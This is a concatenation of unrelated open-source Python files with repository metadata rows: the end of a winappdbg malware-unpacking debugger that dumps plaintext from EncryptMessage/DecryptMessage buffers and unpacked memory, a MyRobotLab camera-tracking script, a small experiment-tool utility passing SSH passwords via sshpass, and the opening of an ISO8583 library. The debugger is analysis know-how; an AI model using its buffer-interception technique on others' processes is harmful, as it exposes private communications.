def post_InternetOpenW(self,event,retval):
self.post_InternetOpen(event,retval,True)
def pre_EncryptMessage(self,event,*args):
# C.?.1 Get the return address and arguments
try:
(ra,phContext,fQOP,pMessage,MessageSeqNo) = (args[0],args[1],args[2],args[3],args[4])
pid = event.get_pid()
tid = event.get_tid()
# Right -- this is going to get annoying
# pMessage is a pointer to a SecBufferDesc structure
# which describes an array of SecBuffer structures
p = event.get_process()
l = p.get_label_at_address(ra)
# really ought to use a ctypes struct for this!
ulVersion = p.peek_uint(pMessage)
cBuffers = p.peek_uint(pMessage + 4)
pBuffers = p.peek_uint(pMessage + 8)
log("[*] <%d:%d> %s 0x%x: EncryptMessage(...)" % (pid,tid,l,ra))
log("[D] ulVersion: %d" % ulVersion)
log("[D] cBuffers: %d" % cBuffers)
log("[D] pBuffers: 0x%x" % pBuffers)
# dump buffer list
for i in range(0,cBuffers):
cbBuffer = p.peek_uint(pBuffers + (i * 12) + 0)
BufferType = p.peek_uint(pBuffers + (i * 12) + 4)
pvBuffer = p.peek_uint(pBuffers + (i * 12) + 8)
if (BufferType == 1): # SECBUFFER_DATA
# we have data to save
filename = sys.argv[1] + ".encmsg0x%08x-%d" % (pvBuffer,pid)
f = open(filename,"ab")
f.write(p.peek(pvBuffer,cbBuffer))
f.close()
log("[D]")
log("[D] cbBuffer: 0x%x (%d)" % (cbBuffer,cbBuffer))
log("[D] BufferType: 0x%x" % BufferType)
log("[D] pvBuffer: 0x%x" % pvBuffer)
except:
traceback.print_exc()
raise
def post_DecryptMessage(self,event,retval):
# C.?.1 Get the return address and arguments
try:
(ra,(phContext,pMessage,MessageSeqNo,pfQOP)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
# Right -- this is going to get annoying
# pMessage is a pointer to a SecBufferDesc structure
# which describes an array of SecBuffer structures
p = event.get_process()
# really ought to use a ctypes struct for this!
ulVersion = p.peek_uint(pMessage)
cBuffers = p.peek_uint(pMessage + 4)
pBuffers = p.peek_uint(pMessage + 8)
log("[*] <%d:%d> 0x%x: DecryptMessage(...)" % (pid,tid,ra))
log("[D] ulVersion: %d" % ulVersion)
log("[D] cBuffers: %d" % cBuffers)
log("[D] pBuffers: 0x%x" % pBuffers)
# dump buffer list
for i in range(0,cBuffers):
cbBuffer = p.peek_uint(pBuffers + (i * 12) + 0)
BufferType = p.peek_uint(pBuffers + (i * 12) + 4)
pvBuffer = p.peek_uint(pBuffers + (i * 12) + 8)
if (BufferType == 1): # SECBUFFER_DATA
# we have data to save
filename = sys.argv[1] + ".decmsg0x%08x-%d" % (pvBuffer,pid)
f = open(filename,"ab")
f.write(p.peek(pvBuffer,cbBuffer))
f.close()
log("[D]")
log("[D] cbBuffer: 0x%x (%d)" % (cbBuffer,cbBuffer))
log("[D] BufferType: 0x%x" % BufferType)
log("[D] pvBuffer: 0x%x" % pvBuffer)
except:
traceback.print_exc()
raise
###
# D. winappdbg debug event handlers
###
### D.1
# create_process
#
# winappdbg defined callback function to handle process creation events
###
def create_process(self,event):
p = event.get_process()
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Create process event for pid %d (%s)" % (pid,tid,p.get_pid(),p.get_image_name()))
log("[-] command line: %s" % p.get_command_line())
#log("[D] Create process event for pid %d (%d)" % (pid,tid))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"pid": p.get_pid(),
"module_base": event.get_module_base(),
"filename": event.get_filename(),
"cmdline": p.get_command_line()
},
})
### D.2
# exit_process
#
# winappdbg defined callback function to handle process exit events
###
def exit_process(self,event):
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Exit process event for %s: 0x%x" % (pid,tid,event.get_filename(),event.get_exit_code()))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"module_base": event.get_module_base(),
"filename": event.get_filename(),
"exitcode": event.get_exit_code()
},
})
### D.3
# create_thread
#
# winappdbg defined callback function to handle thread creation events
###
def create_thread(self,event):
pid = event.get_pid()
tid = event.get_tid()
t = event.get_thread()
name = t.get_name()
log("[*] <%d:%d> Create thread event \"%s\" @ 0x%x" % (pid,tid,name,event.get_start_address()))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"startaddress": event.get_start_address(),
"threadname": name
},
})
### D.4
# exit_thread
#
# winappdbg defined callback function to handle thread exit events
###
def exit_thread(self,event):
pid = event.get_pid()
tid = event.get_tid()
t = event.get_thread()
name = t.get_name()
log("[*] <%d:%d> Exit thread event \"%s\"" % (pid,tid,name,))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"threadname": name
},
})
### D.5
# load_dll
#
# winappdbg defined callback function to handle DLL load events
###
def load_dll(self,event):
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Load DLL event: %s" % (pid,tid,event.get_filename()))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"module_base": event.get_module_base(),
"filename": event.get_filename(),
},
})
### D.6
# event
#
# winappdbg defined callback function to handle any remaining events
###
def event(self,event):
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Unhandled event: %s" % (pid,tid,event.get_event_name()))
###
# E. winappdbg debug exception handlers
###
### E.1
# guard_page
#
# winappdbg defined callback function to handle guard page exceptions
###
def guard_page_exemem(self,exception):
try:
f_type = exception.get_fault_type()
e_addr = exception.get_exception_address()
f_addr = exception.get_fault_address()
# get the process and thread ids
pid = exception.get_pid()
tid = exception.get_tid()
# It is interesting to log this, but it generates a lot of log
# output and slows the whole process down
#log("[!] <%d:%d> 0x%x: GUARD_PAGE(%d) exception for address 0x%x" % (pid,tid,e_addr,f_type,f_addr))
#log("[*] VirtualAlloc()d memory address 0x%x accessed (%d) from 0x%x (%s)" % (f_addr,f_type,e_addr,instr))
# E.1.2 Was it a memory write operation?
if (f_type == winappdbg.win32.EXCEPTION_WRITE_FAULT):
# E.1.2.1 Use the writeaddrs[] array to check to see
# if we have already logged access from this
# address, as unpacking is generally done in
# a loop and we don't want to log the same
# instructions for each iteration
if not e_addr in self.writeaddrs:
p = exception.get_process()
t = exception.get_thread()
label = p.get_label_at_address(e_addr)
instr = t.disassemble_instruction(e_addr)[2].lower()
log("[*] VirtualAlloc()d memory address 0x%x written from 0x%x (%s): %s" % (f_addr,e_addr,label,instr))
self.writeaddrs[e_addr] = instr
# E.1.2.2 Use the tracing variable to see if we have
# already started tracing, that is single
# stepping. If not, enable it, and make a note
# of the fact by setting the tracing variable
# to True
if (self.tracing == -1):
self.tracing = 0
d = exception.debug
log("[-] Enabling tracing")
d.start_tracing(exception.get_tid())
# E.1.3 Was it a memory instruction fetch (execute) operation,
# and if so, are we still looking for the entry point address?
if (f_type == winappdbg.win32.EXCEPTION_EXECUTE_FAULT) and (self.entrypt == 0):
self.entrypt = e_addr
t = exception.get_thread()
jmpinstr = t.disassemble_instruction(self.lasteip[0])[2].lower()
# E.1.3.1 Log what we've found
#log("[D] lasteip[1]: 0x%x" % self.lasteip[1])
log("[*] Found unpacked entry point at 0x%x called from 0x%x (%s) (after executing %d instructions)" % (self.entrypt,self.lasteip[0],jmpinstr,self.tracing))
log("[-] Unpacking loop at 0x%x - 0x%x" % (self.lowesteip,self.highesteip))
pid = exception.get_pid()
tid = exception.get_tid()
elog = ({
"time": time.time(),
"name": "unpacking loop found",
"type": "unpack event",
"pid": pid,
"tid": tid,
"info": {
"unpacked_entry_point": self.entrypt,
"callingaddr": self.lasteip[0],
"callinginstr": jmpinstr
},
})
# E.1.3.2
for (mem_pid,memblk) in self.allocedmem:
if (mem_pid == pid):
size = self.allocedmem[(mem_pid,memblk)]
endaddr = memblk + size - 1
if (e_addr >= memblk) and (e_addr <= endaddr):
# E.1.3.3 Log what we're doing and delete the memory breakpoint
log("[-] Dumping %d bytes of memory range 0x%x - 0x%x" % (size,memblk,endaddr))
d = exception.debug
d.dont_watch_buffer(exception.get_pid(),memblk,size - 1)
# E.1.3.4 Disable single-step debugging
self.tracing = -1
d.stop_tracing(exception.get_tid())
# E.1.3.5 Reset unpacking loop variables
self.entrypt = 0x00000000
#del self.lasteip
self.lasteip = [0x00000000,0x00000000]
self.lowesteip = 0xffffffff
self.highest = 0x00000000
# E.1.3.6 Dump the memory block to a file
p = exception.get_process()
filename = sys.argv[1] + ".memblk0x%08x" % memblk
dumpfile = open(filename,"wb")
dumpfile.write(p.read(memblk,size))
dumpfile.close()
elog["info"]["filename"] = filename
self.eventlog.append(elog)
except Exception as e:
traceback.print_exc()
raise
### E.2
# single_step
#
# winappdbg defined callback function to handle single step exceptions
###
def single_step(self,exception):
try:
# E.2.1 Get the exception address
e_addr = exception.get_exception_address()
# E.2.2 If we have just looped back (eip has gone backward)
if (e_addr < self.lasteip[1]):
# Remember this lower address as the lowest loop address
if self.lowesteip == 0xffffffff: self.lowesteip = e_addr
# ... and the address we just jumped from as the highest loop address
if self.highesteip == 0x00000000: self.highesteip = self.lasteip[1]
# E.2.3 If we are executing an instruction within the bounds of the loop
# and we haven't already disassembled this address, then do so
if (e_addr >= self.lowesteip) and (e_addr <= self.highesteip) and (not e_addr in self.disasmd):
t = exception.get_thread()
disasm = t.disassemble_instruction(e_addr)
instr = disasm[2].lower()
log(" 0x%x: %s" % (e_addr,instr))
self.disasmd.append(e_addr)
# E.2.4 Remember the last two instruction addresses (eip values)
# We need to remember the last two in order to be able to
# disassemble the instruction that jumped to the original
# entry point in the unpacked code
self.lasteip[0] = self.lasteip[1]
self.lasteip[1] = e_addr
# E.2.5 Increment the instruction counter, and check to see if
# we have reached our limit of 250,000 instructions.
# If so, assume that there is no unpacking loop and stop
# tracing (to speed up execution).
self.tracing += 1
if (self.tracing >= 250000):
log("[E] Reached tracing limit of 250000 instructions")
d = exception.debug
pid = exception.get_pid()
d.break_at(pid,e_addr,self.bp_stoptracing)
self.tracing = -1
except Exception as e:
traceback.print_exc()
raise
# E.2.6 bp_stoptracing()
# Set as a breakpoint handler when we want to stop tracing, as we can't
# disable single-step tracing from within the single-step call-back function.
def bp_stoptracing(self,exception):
log("[D] Single-step instruction limit reached -- stopping tracing")
d = exception.debug
tid = exception.get_tid()
pid = exception.get_pid()
d.stop_tracing(tid)
d.dont_break_at(pid,exception.get_exception_address())
### E.3
# exception
#
# winappdbg defined callback function to handle remaining exceptions
###
def exception(self,exception):
log("[*] Unhandled exception at 0x%x: %s" % (exception.get_exception_address(),exception.get_exception_name()))
#log("[-] 0x%x fault at 0x%x" % (exception.get_fault_type(),exception.get_fault_address()))
#
#### end of MyEventHandler class
#
###
# F. Miscellaneous functions
###
### F.1
# log(msg):
###
def log(msg):
global logfile
print(msg)
if not logfile:
logfile = open(sys.argv[1] + ".log","w")
if logfile:
logfile.write(msg + "\n")
logfile.flush()
#logfile.log_text(msg)
### F.2
# simple_debugger(argv):
###
def simple_debugger(filename):
global logfile
try:
handler = MyEventHandler()
#logfile = winappdbg.textio.Logger(filename + ".log",verbose = True)
except:
traceback.print_exc()
with winappdbg.Debug(handler,bKillOnExit = True, bHostileCode = False) as debug:
log("[*] Starting %s" % filename)
debug.execl(filename,bFollow = False)
log("[*] Starting debug loop")
debug.loop()
log("[*] Terminating")
log("[D] Number of created processes: %d" % len(handler.createdprocesses))
for i in range(0,len(handler.eventlog)):
log("%s" % handler.eventlog[i])
###
# G. Start of script execution
###
log("[*] Started at %s" % time.strftime("%Y-%m-%d %H:%M:%S"))
simple_debugger(sys.argv[1])
log("[*] Completed at %s" % time.strftime("%Y-%m-%d %H:%M:%S"))
|
gpl-3.0
| -5,576,724,572,586,196,000
| 29.260176
| 227
| 0.600406
| false
| 3.42945
| false
| false
| false
|
MyRobotLab/pyrobotlab
|
home/CheekyMonkey/tracking-arduino.py
|
1
|
2678
|
# A script to test opencv tracking in MyRobotLab with an Arduino connected to a Raspberry Pi 3
# as at mrl development build version 2489
# a mashup of code taken from Mats:
# https://github.com/MyRobotLab/pyrobotlab/blob/master/home/Mats/Tracking.py
# and also from Grog:
# http://myrobotlab.org/content/tracking-results
#
from org.myrobotlab.opencv import OpenCVFilterPyramidDown
#Define the x and y tracking servo pins
#articulated neck servos
centreneckPin = 1 # vertical motion
mainneckPin = 2 # horizontal motion
xPin = 9; # horizontal motion
yPin = 10; # vertical motion
#set which camera to use. In my case, 0 references the Raspberry Pi camera
cameraIndex = 0
# set the port to which the Arduino is connected
arduinoPort = '/dev/ttyUSB0'
# start a tracker service instance
tracker = Runtime.start("tracker", "Tracking");
tracker.connect(arduinoPort, xPin, yPin, cameraIndex);
x = tracker.getX();
# invert if necessary
# x.setInverted(True);
x.setVelocity(20)
x.setMinMax(60,90)
#x.setInverted(True);
x.setRest(85)
x.rest()
y = tracker.getY();
y.setVelocity(20)
y.setInverted(True);
y.setMinMax(60,75)
y.setRest(70)
y.rest()
#start an Arduino service instance
#arduino = Runtime.start("tracker.controller","Arduino")
#define a tracker PID instance
pid = Runtime.start("tracker.pid","Pid")
#set the x and y PID values
#pid.setPID("x", 20.0, 5.0, 0.1);
#pid.setPID("y", 20.0, 5.0, 0.1);
opencv = Runtime.start("tracker.opencv","OpenCV")
pid.setPID("x", 5.0, 1.0, 0.1);
pid.setPID("y", 5.0, 1.0, 0.1);
#get the tracker opencv service instance
#opencv = Runtime.getService("tracker.opencv")
sleep(2);
#opencv.addFilter("PyramidDown1","PyramidDown")
#opencv.addFilter("Gray1","Gray")
#as at mrl development build 2423 this next piece is required on the Raspberry Pi (3) under javacv1.3
#for opencv to return video frames
#frameGrabberType = "org.bytedeco.javacv.FFmpegFrameGrabber";
#opencv.captureFromResourceFile("/dev/video0");
#opencv.setFrameGrabberType(frameGrabberType);
#opencv.broadcastState();
#sleep(3);
#rest for a bit
#sleep(3);
tracker.y.setInverted(True);
# additional PyramidDown filter for improved framerate on the Pi (~15 fps)
PreFilterPyramidDown = OpenCVFilterPyramidDown("PreFilterPyramidDown")
tracker.preFilters.add(PreFilterPyramidDown)
tracker.opencv.setDisplayFilter("PreFilterPyramidDown")
#start the opencv video frame capture
opencv.capture();
#opencv.addFilter("lkOpticalTrack1","LKOpticalTrack")
#opencv.setDisplayFilter("lkOpticalTrack1")
#sleep(1)
#opencv.invokeFilterMethod("lkOpticalTrack1","samplePoint",160,120)
#start tracking
#1# tracker.startLKTracking()
#2# tracker.findFace()
#3# tracker.faceDetect()
|
apache-2.0
| -6,644,644,271,138,608,000
| 25.514851
| 102
| 0.754668
| false
| 2.85197
| false
| false
| false
|
tomsercu/metarunlog
|
metarunlog/util.py
|
1
|
1967
|
# Metarunlog, experiment management tool.
# Author: Tom Sercu
# Date: 2015-01-23
import datetime
import subprocess
def nowstring(sec=True, ms= False):
tstr = datetime.datetime.now().isoformat()
if not ms:
tstr = tstr.split('.')[0]
if not sec:
tstr = tstr.rsplit(':',1)[0]
return tstr
def sshify(cmd, sshHost, sshPass, vfh=None):
cleancmd = ''
if sshHost:
#cmd = 'ssh -t {} "{}"'.format(sshHost, cmd) #works but messes up terminal
#cmd = 'ssh {} "shopt -s huponexit; {}"'.format(sshHost, cmd) # doesnt work to kill job on exit
cmd = 'ssh {} "{}"'.format(sshHost, cmd)
#TODO use paramiko or pexpect see http://stackoverflow.com/questions/4669204/send-ctrl-c-to-remote-processes-started-via-subprocess-popen-and-ssh
if sshPass:
cleancmd = "sshpass -p '{}' {}".format('***', cmd)
cmd = "sshpass -p '{}' {}".format(sshPass, cmd)
# printing
if not cleancmd: cleancmd = cmd
if vfh: vfh.write(cleancmd + '\n')
return cmd
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
def get_commit():
cline = subprocess.check_output("git log -n1 --oneline", shell=True)
#print "cline: ", cline
cline = cline.split()
return (cline[0], " ".join(cline[1:]))
|
mit
| -735,737,418,120,828,800
| 30.725806
| 153
| 0.582613
| false
| 3.414931
| false
| false
| false
|
Seedstars/python-iso8583
|
ISO8583/ISO8583.py
|
1
|
56605
|
"""
(C) Copyright 2009 Igor V. Custodio
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = 'Igor Vitorio Custodio <igorvc@vulcanno.com.br>'
__version__ = '1.3.1'
__licence__ = 'GPL V3'
from ISOErrors import *
import struct
class ISO8583:
"""Main Class to work with ISO8583 packages.
Used to create, change, send, receive, parse or work with ISO8593 Package version 1993.
It's 100% Python :)
Enjoy it!
Thanks to: Vulcanno IT Solutions <http://www.vulcanno.com.br>
Licence: GPL Version 3
More information: http://code.google.com/p/iso8583py/
Example:
from ISO8583.ISO8583 import ISO8583
from ISO8583.ISOErrors import *
iso = ISO8583()
try:
iso.setMTI('0800')
iso.setBit(2,2)
iso.setBit(4,4)
iso.setBit(12,12)
iso.setBit(21,21)
iso.setBit(17,17)
iso.setBit(49,986)
iso.setBit(99,99)
except ValueToLarge, e:
print ('Value too large :( %s' % e)
except InvalidMTI, i:
print ('This MTI is wrong :( %s' % i)
print ('The Message Type Indication is = %s' %iso.getMTI())
print ('The Bitmap is = %s' %iso.getBitmap())
iso.showIsoBits();
print ('This is the ISO8583 complete package %s' % iso.getRawIso())
print ('This is the ISO8583 complete package to sent over the TCPIP network %s' % iso.getNetworkISO())
"""
# Attributes
# Bitsto be set 00000000 -> _BIT_POSITION_1 ... _BIT_POSITION_8
_BIT_POSITION_1 = 128 # 10 00 00 00
_BIT_POSITION_2 = 64 # 01 00 00 00
_BIT_POSITION_3 = 32 # 00 10 00 00
_BIT_POSITION_4 = 16 # 00 01 00 00
_BIT_POSITION_5 = 8 # 00 00 10 00
_BIT_POSITION_6 = 4 # 00 00 01 00
_BIT_POSITION_7 = 2 # 00 00 00 10
_BIT_POSITION_8 = 1 # 00 00 00 01
# Array to translate bit to position
_TMP = [0, _BIT_POSITION_8, _BIT_POSITION_1, _BIT_POSITION_2, _BIT_POSITION_3, _BIT_POSITION_4, _BIT_POSITION_5,
_BIT_POSITION_6, _BIT_POSITION_7]
_BIT_DEFAULT_VALUE = 0
# ISO8583 contants
_BITS_VALUE_TYPE = {}
# Every _BITS_VALUE_TYPE has:
# _BITS_VALUE_TYPE[N] = [ X,Y, Z, W,K]
# N = bitnumber
# X = smallStr representation of the bit meanning
# Y = large str representation
# Z = type of the bit (B, N, A, AN, ANS, LL, LLL)
# W = size of the information that N need to has
# K = type os values a, an, n, ansb, b
_BITS_VALUE_TYPE[1] = ['BME', 'Bit Map Extended', 'B', 16, 'b']
_BITS_VALUE_TYPE[2] = ['2', 'Primary account number (PAN)', 'LL', 19, 'n']
_BITS_VALUE_TYPE[3] = ['3', 'Precessing code', 'N', 6, 'n']
_BITS_VALUE_TYPE[4] = ['4', 'Amount transaction', 'N', 12, 'n']
_BITS_VALUE_TYPE[5] = ['5', 'Amount reconciliation', 'N', 12, 'n']
_BITS_VALUE_TYPE[6] = ['6', 'Amount cardholder billing', 'N', 12, 'n']
_BITS_VALUE_TYPE[7] = ['7', 'Date and time transmission', 'N', 10, 'n']
_BITS_VALUE_TYPE[8] = ['8', 'Amount cardholder billing fee', 'N', 8, 'n']
_BITS_VALUE_TYPE[9] = ['9', 'Conversion rate reconciliation', 'N', 8, 'n']
_BITS_VALUE_TYPE[10] = ['10', 'Conversion rate cardholder billing', 'N', 8, 'n']
_BITS_VALUE_TYPE[11] = ['11', 'Systems trace audit number', 'N', 6, 'n']
_BITS_VALUE_TYPE[12] = ['12', 'Date and time local transaction', 'N', 6, 'n']
_BITS_VALUE_TYPE[13] = ['13', 'Date effective', 'N', 4, 'n']
_BITS_VALUE_TYPE[14] = ['14', 'Date expiration', 'N', 4, 'n']
_BITS_VALUE_TYPE[15] = ['15', 'Date settlement', 'N', 4, 'n']
_BITS_VALUE_TYPE[16] = ['16', 'Date conversion', 'N', 4, 'n']
_BITS_VALUE_TYPE[17] = ['17', 'Date capture', 'N', 4, 'n']
_BITS_VALUE_TYPE[18] = ['18', 'Message error indicator', 'N', 4, 'n']
_BITS_VALUE_TYPE[19] = ['19', 'Country code acquiring institution', 'N', 3, 'n']
_BITS_VALUE_TYPE[20] = ['20', 'Country code primary account number (PAN)', 'N', 3, 'n']
_BITS_VALUE_TYPE[21] = ['21', 'Transaction life cycle identification data', 'ANS', 3, 'n']
_BITS_VALUE_TYPE[22] = ['22', 'Point of service data code', 'N', 3, 'n']
_BITS_VALUE_TYPE[23] = ['23', 'Card sequence number', 'N', 3, 'n']
_BITS_VALUE_TYPE[24] = ['24', 'Function code', 'N', 3, 'n']
_BITS_VALUE_TYPE[25] = ['25', 'Message reason code', 'N', 2, 'n']
_BITS_VALUE_TYPE[26] = ['26', 'Merchant category code', 'N', 2, 'n']
_BITS_VALUE_TYPE[27] = ['27', 'Point of service capability', 'N', 1, 'n']
_BITS_VALUE_TYPE[28] = ['28', 'Date reconciliation', 'N', 8, 'n']
_BITS_VALUE_TYPE[29] = ['29', 'Reconciliation indicator', 'N', 8, 'n']
_BITS_VALUE_TYPE[30] = ['30', 'Amounts original', 'N', 8, 'n']
_BITS_VALUE_TYPE[31] = ['31', 'Acquirer reference number', 'N', 8, 'n']
_BITS_VALUE_TYPE[32] = ['32', 'Acquiring institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[33] = ['33', 'Forwarding institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[34] = ['34', 'Electronic commerce data', 'LL', 28, 'n']
_BITS_VALUE_TYPE[35] = ['35', 'Track 2 data', 'LL', 37, 'n']
_BITS_VALUE_TYPE[36] = ['36', 'Track 3 data', 'LLL', 104, 'n']
_BITS_VALUE_TYPE[37] = ['37', 'Retrieval reference number', 'N', 12, 'an']
_BITS_VALUE_TYPE[38] = ['38', 'Approval code', 'N', 6, 'an']
_BITS_VALUE_TYPE[39] = ['39', 'Action code', 'A', 2, 'an']
_BITS_VALUE_TYPE[40] = ['40', 'Service code', 'N', 3, 'an']
_BITS_VALUE_TYPE[41] = ['41', 'Card acceptor terminal identification', 'N', 8, 'ans']
_BITS_VALUE_TYPE[42] = ['42', 'Card acceptor identification code', 'A', 15, 'ans']
_BITS_VALUE_TYPE[43] = ['43', 'Card acceptor name/location', 'A', 40, 'asn']
_BITS_VALUE_TYPE[44] = ['44', 'Additional response data', 'LL', 25, 'an']
_BITS_VALUE_TYPE[45] = ['45', 'Track 1 data', 'LL', 76, 'an']
_BITS_VALUE_TYPE[46] = ['46', 'Amounts fees', 'LLL', 999, 'an']
_BITS_VALUE_TYPE[47] = ['47', 'Additional data national', 'LLL', 999, 'an']
_BITS_VALUE_TYPE[48] = ['48', 'Additional data private', 'LLL', 999, 'an']
_BITS_VALUE_TYPE[49] = ['49', 'Verification data', 'A', 3, 'a']
_BITS_VALUE_TYPE[50] = ['50', 'Currency code, settlement', 'AN', 3, 'an']
_BITS_VALUE_TYPE[51] = ['51', 'Currency code, cardholder billing', 'A', 3, 'a']
_BITS_VALUE_TYPE[52] = ['52', 'Personal identification number (PIN) data', 'B', 16, 'b']
_BITS_VALUE_TYPE[53] = ['53', 'Security related control information', 'LL', 18, 'n']
_BITS_VALUE_TYPE[54] = ['54', 'Amounts additional', 'LLL', 120, 'an']
_BITS_VALUE_TYPE[55] = ['55', 'Integrated circuit card (ICC) system related data', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[56] = ['56', 'Original data elements', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[57] = ['57', 'Authorisation life cycle code', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[58] = ['58', 'Authorising agent institution identification code', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[59] = ['59', 'Transport data', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[60] = ['60', 'Reserved for national use', 'LL', 7, 'ans']
_BITS_VALUE_TYPE[61] = ['61', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[62] = ['62', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[63] = ['63', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[64] = ['64', 'Message authentication code (MAC) field', 'B', 16, 'b']
_BITS_VALUE_TYPE[65] = ['65', 'Bitmap tertiary', 'B', 16, 'b']
_BITS_VALUE_TYPE[66] = ['66', 'Settlement code', 'N', 1, 'n']
_BITS_VALUE_TYPE[67] = ['67', 'Extended payment data', 'N', 2, 'n']
_BITS_VALUE_TYPE[68] = ['68', 'Receiving institution country code', 'N', 3, 'n']
_BITS_VALUE_TYPE[69] = ['69', 'Settlement institution county code', 'N', 3, 'n']
_BITS_VALUE_TYPE[70] = ['70', 'Network management Information code', 'N', 3, 'n']
_BITS_VALUE_TYPE[71] = ['71', 'Message number', 'N', 4, 'n']
_BITS_VALUE_TYPE[72] = ['72', 'Data record', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[73] = ['73', 'Date action', 'N', 6, 'n']
_BITS_VALUE_TYPE[74] = ['74', 'Credits, number', 'N', 10, 'n']
_BITS_VALUE_TYPE[75] = ['75', 'Credits, reversal number', 'N', 10, 'n']
_BITS_VALUE_TYPE[76] = ['76', 'Debits, number', 'N', 10, 'n']
_BITS_VALUE_TYPE[77] = ['77', 'Debits, reversal number', 'N', 10, 'n']
_BITS_VALUE_TYPE[78] = ['78', 'Transfer number', 'N', 10, 'n']
_BITS_VALUE_TYPE[79] = ['79', 'Transfer, reversal number', 'N', 10, 'n']
_BITS_VALUE_TYPE[80] = ['80', 'Inquiries number', 'N', 10, 'n']
_BITS_VALUE_TYPE[81] = ['81', 'Authorizations, number', 'N', 10, 'n']
_BITS_VALUE_TYPE[82] = ['82', 'Credits, processing fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[83] = ['83', 'Credits, transaction fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[84] = ['84', 'Debits, processing fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[85] = ['85', 'Debits, transaction fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[86] = ['86', 'Credits, amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[87] = ['87', 'Credits, reversal amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[88] = ['88', 'Debits, amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[89] = ['89', 'Debits, reversal amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[90] = ['90', 'Original data elements', 'N', 42, 'n']
_BITS_VALUE_TYPE[91] = ['91', 'File update code', 'AN', 1, 'an']
_BITS_VALUE_TYPE[92] = ['92', 'File security code', 'N', 2, 'n']
_BITS_VALUE_TYPE[93] = ['93', 'Response indicator', 'N', 5, 'n']
_BITS_VALUE_TYPE[94] = ['94', 'Service indicator', 'AN', 7, 'an']
_BITS_VALUE_TYPE[95] = ['95', 'Replacement amounts', 'AN', 42, 'an']
_BITS_VALUE_TYPE[96] = ['96', 'Message security code', 'AN', 8, 'an']
_BITS_VALUE_TYPE[97] = ['97', 'Amount, net settlement', 'N', 16, 'n']
_BITS_VALUE_TYPE[98] = ['98', 'Payee', 'ANS', 25, 'ans']
_BITS_VALUE_TYPE[99] = ['99', 'Settlement institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[100] = ['100', 'Receiving institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[101] = ['101', 'File name', 'ANS', 17, 'ans']
_BITS_VALUE_TYPE[102] = ['102', 'Account identification 1', 'LL', 28, 'ans']
_BITS_VALUE_TYPE[103] = ['103', 'Account identification 2', 'LL', 28, 'ans']
_BITS_VALUE_TYPE[104] = ['104', 'Transaction description', 'LLL', 100, 'ans']
_BITS_VALUE_TYPE[105] = ['105', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[106] = ['106', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[107] = ['107', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[108] = ['108', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[109] = ['109', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[110] = ['110', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[111] = ['111', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[112] = ['112', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[113] = ['113', 'Reserved for private use', 'LL', 11, 'n']
_BITS_VALUE_TYPE[114] = ['114', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[115] = ['115', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[116] = ['116', 'Reserved for national use', 'LLL', 999, 'ans']
